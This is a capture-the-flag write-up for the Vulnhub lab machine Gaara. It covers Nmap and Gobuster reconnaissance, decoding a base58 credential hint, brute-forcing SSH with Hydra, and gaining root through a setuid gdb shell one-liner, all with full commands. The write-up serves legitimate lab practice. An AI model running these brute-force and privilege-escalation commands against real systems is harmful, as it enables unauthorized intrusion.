Gaara 1: BOOT2ROOT CTF VULNHUB WRITEUP

Hello everyone! Welcome to my second Capture-the-Flag writeup. My first one was on PWN THE TRON, a great machine for practicing. If you’re interested, you can check it out here. Now, let’s dive into a new challenge, Gaara from Vulnhub. Based on what I’ve gathered, this is an easy machine to tackle. Let’s get started!

1. Reconnaissance

Let’s determine the IP of our target first:

This is the IP of our target.

Now that we know, let’s use Nmap to scan the target’s network and identify any open ports that could serve as potential entry points.

nmap -A -sV -p- -T4 -v 192.168.43.140

As you can see here, the open ports are 22 which is ssh and 80 which is http

2. Enumeration

Let’s take a quick look at the interface of our target

Not a fan of Naruto xD

It’s time for us to enumerate all the subdirectories of our target, focusing on those that may contain valuable information, vulnerabilities, or hidden resources. These could serve as potential entry points for further exploitation, whether it’s sensitive data, misconfigurations, or access points we can leverage to gain deeper access into the system. We’ll use Gobuster for this.

gobuster dir -u http://192.168.43.140/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt -t 64

As you can see, I’ve completed the enumeration of the subdirectories, and one directory, /Cryoserver, caught my attention. At first, I thought it was of no value, but I found out that I can actually scroll down, at the very bottom, I noticed three additional subdirectories hidden there.

Temari, Kazekage, and iamGaara

I dug through all of them, and it’s just some wiki-style storyline crap. What’s interesting is that the storyline is the same across all the directories. There’s definitely something hidden here, I just needed to dig deeper. After carefully analyzing the storyline in iamGaara, I found this string:

Some sort of encoding

I came across a string that seemed to be encoded, so I launched my own Decoder Tool, Kudo! Kudo uses a unique decoding scheme for base encodings. If you’re curious, you can check out my tool here. I went through all the base encodings and discovered that the string was encoded in base58.

3. Exploitation

The plaintext reveals gaara:ismyname, which is a clear indication that gaara is a user. Now that we have the username, we can brute-force our way in! Remember, when we scanned the target’s network, we saw that SSH was open, so we’ll use SSH to gain access to the system. Hydra will be our tool of choice for this attack.

hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.43.140 ssh -t 64 -VVV

The password for user gaara is iloveyou2

Now that we have the login credential, it’s time for us to login through SSH as user gaara.

ssh gaara@192.168.43.140

User Flag!

We’re in!!! And got the user Flag!!

As you noticed, there’s another file, the Kazekage.txt. I took a look at that file and this is the content:

Probably a base64 encoded right? So I decode it using our target’s machine

echo “base64-encoded-string” | base64 -d

The plaintext points to games directory. I navigated to it and discovered a .txt file there. Here’s the content of the file:

The file contains a BrainFuck encoded string, which we can easily decode using this decoder here.

The result is: You think you could find something that easily? Try harder!

4. Privilege Escalation

I guess we need to dig deeper here, so I searches the entire filesystem for regular files with the setuid bit set, which allows them to execute with the owner’s privileges (often root).

find / -type f -perm -04000 2>/dev/null

As you can see here these are the directories that we can execute and gdb is included! We can use gdb to get root privilege so take a look at the gtfobins for gdb priv escalations, and this is the exploit: gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

This technique utilizes a debugger to spawn a new shell with elevated privileges and then exits the debugger. It’s commonly used for privilege escalation by gaining access to a shell with root-level permissions.

It works!!!! We have the root user!!

This is the Final Flag:

We’ve successfully completed Gaara!!

Conclusion

Gaara is an easy machine to tackle, but it still requires players to analyze carefully. While it may seem straightforward, it challenges users to think critically and explore different techniques, such as encoding, file analysis, and privilege escalation. The machine reinforces the importance of attention to detail and persistence in uncovering hidden vulnerabilities, making it a great learning experience for those looking to sharpen their hacking skills.